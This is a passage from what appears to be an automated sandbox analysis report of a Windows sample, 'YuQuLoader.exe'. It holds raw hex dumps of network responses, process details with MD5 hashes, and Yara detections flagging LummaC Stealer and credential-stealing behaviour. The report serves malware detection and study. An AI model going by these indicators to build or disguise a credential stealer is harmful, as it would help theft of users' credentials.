                                                                                    Data Ascii: =$Z8-;q11I-[P9Ek74SR9uGuM(dC3m>Wsf"]Q:{-5'Iha4H9zl90fcH4blGTs:hyIHp`bUp^j\9S3QSkwzn3u
                                                                                    2025-03-11 16:23:56 UTC1369INData Raw: 7b d2 90 de 58 37 5e 78 59 73 b7 6e 37 ec 68 72 ab 03 a5 de 73 96 04 44 06 b8 10 ac d6 0d 58 82 1f 1b 5d f3 df e4 e2 8d 0e 85 aa ec c2 3d 8b e3 52 09 25 54 c2 82 23 4b d7 aa fc 9f 93 be 8b 3a 9c 03 e6 c6 f9 3f 7d cc 35 7c e1 82 f8 ad 60 3b cc 3b 0f 26 18 2e d8 97 5a bc e3 d8 d2 35 42 2b a9 aa 98 92 75 af 77 c3 24 4b 1a b6 06 e6 40 1a 3a 3f 44 2a 4a 3e d1 55 61 ea 8d c3 c6 09 fa 96 2f 49 41 fc b8 87 49 c7 5a bb 03 9e d4 2b a2 c1 ca 76 34 b5 de c8 67 1f 2d 04 8f f9 bf 4e 47 91 b7 8d 5a 13 d1 82 5c 3e 71 de 0f c3 7e 61 3f fe cb e2 a3 9b 0a 9b 40 4d 58 8b 5a ed b6 75 aa 4f e3 cf 8b 4e 74 55 c7 f0 12 70 51 75 f9 c5 37 bd ee b0 c0 27 90 e7 64 96 fc ce 5d 24 2f 2a ac 8e 19 6a 08 d4 b6 0a 7e f4 e6 ef 9a 40 c7 46 55 b6 13 a6 3c a0 f8 11 91 b7 e4 99 de e7 b6 36 12
                                                                                    Data Ascii: {X7^xYsn7hrsDX]=R%T#K:?}5|`;;&.Z5B+uw$K@:?D*J>Ua/IAIZ+v4g-NGZ\>q~a?@MXZuONtUpQu7'd]$/*j~@FU<6
                                                                                    2025-03-11 16:23:56 UTC387INData Raw: 8a d6 4c 75 99 d4 bd 6a 6c 23 ad 24 6b ce 5a 87 cb 88 b5 b9 a5 09 5a 31 54 ad 56 4f 85 29 3c b4 6c 4c b4 38 43 b0 92 1a e9 00 4e 67 5d a4 25 20 98 67 67 1c 48 8a 1a 4e bd df e9 81 93 70 9b cb b3 2e 5f dc 0c da 06 14 e7 cb 51 3b 0a 75 83 af b1 3e 49 62 1e 2e 74 ee f5 0b 6d 93 ac cb 19 d1 7a 2c 3d d5 c1 12 a5 2e ed 97 42 67 92 81 1e 23 b7 61 20 78 6d ed 00 59 21 68 30 e3 50 1b 25 04 00 e3 68 df a7 d5 d1 7c 7a fa 4c 44 d5 2c 6f 2f d2 72 b2 d5 13 ab 0b 99 e2 da 73 fc 52 0d 4d a7 f4 e9 ca 40 65 04 23 16 5b 69 e8 5b 10 33 29 c3 2d 1b ec 62 6f a0 a9 78 e8 82 34 86 c7 f7 36 96 22 9b df d9 34 3f 1d 5a 1b 97 d5 2e 46 f5 77 cb 72 2b 7c e8 5c c9 f7 79 e6 97 08 a8 04 fe 26 7f 75 9e ff b6 a1 17 3f f8 ef 40 ad 51 73 d8 00 b2 2b d0 4d 4b 6a e8 06 3a 75 44 ed c8 2c 29 f9
                                                                                    Data Ascii: Lujl#$kZZ1TVO)<lL8CNg]% ggHNp._Q;u>Ib.tmz,=.Bg#a xmY!h0P%h|zLD,o/rsRM@e#[i[3)-box46"4?Z.Fwr+|\y&u?@Qs+MKj:uD,)


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:12:23:24
                                                                                    Start date:11/03/2025
                                                                                    Path:C:\Users\user\Desktop\YuQuLoader.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\YuQuLoader.exe"
                                                                                    Imagebase:0xa90000
                                                                                    File size:1'362'432 bytes
                                                                                    MD5 hash:849C830E2AF83F171E9607E3D2E7F694
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1444774555.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:1
                                                                                    Start time:12:23:24
                                                                                    Start date:11/03/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7e2000000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:2
                                                                                    Start time:12:23:24
                                                                                    Start date:11/03/2025
                                                                                    Path:C:\Users\user\Desktop\YuQuLoader.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\YuQuLoader.exe"
                                                                                    Imagebase:0xa90000
                                                                                    File size:1'362'432 bytes
                                                                                    MD5 hash:849C830E2AF83F171E9607E3D2E7F694
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1557228002.0000000001640000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1557692943.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1557429661.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1557429661.0000000001640000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000002.00000002.2617683051.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1557228002.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1558849037.0000000001644000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1557692943.0000000001640000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:5
                                                                                    Start time:12:23:25
                                                                                    Start date:11/03/2025
                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8608 -s 404
                                                                                    Imagebase:0xa40000
                                                                                    File size:483'680 bytes
                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Disassembly

                                                                                    Reset < >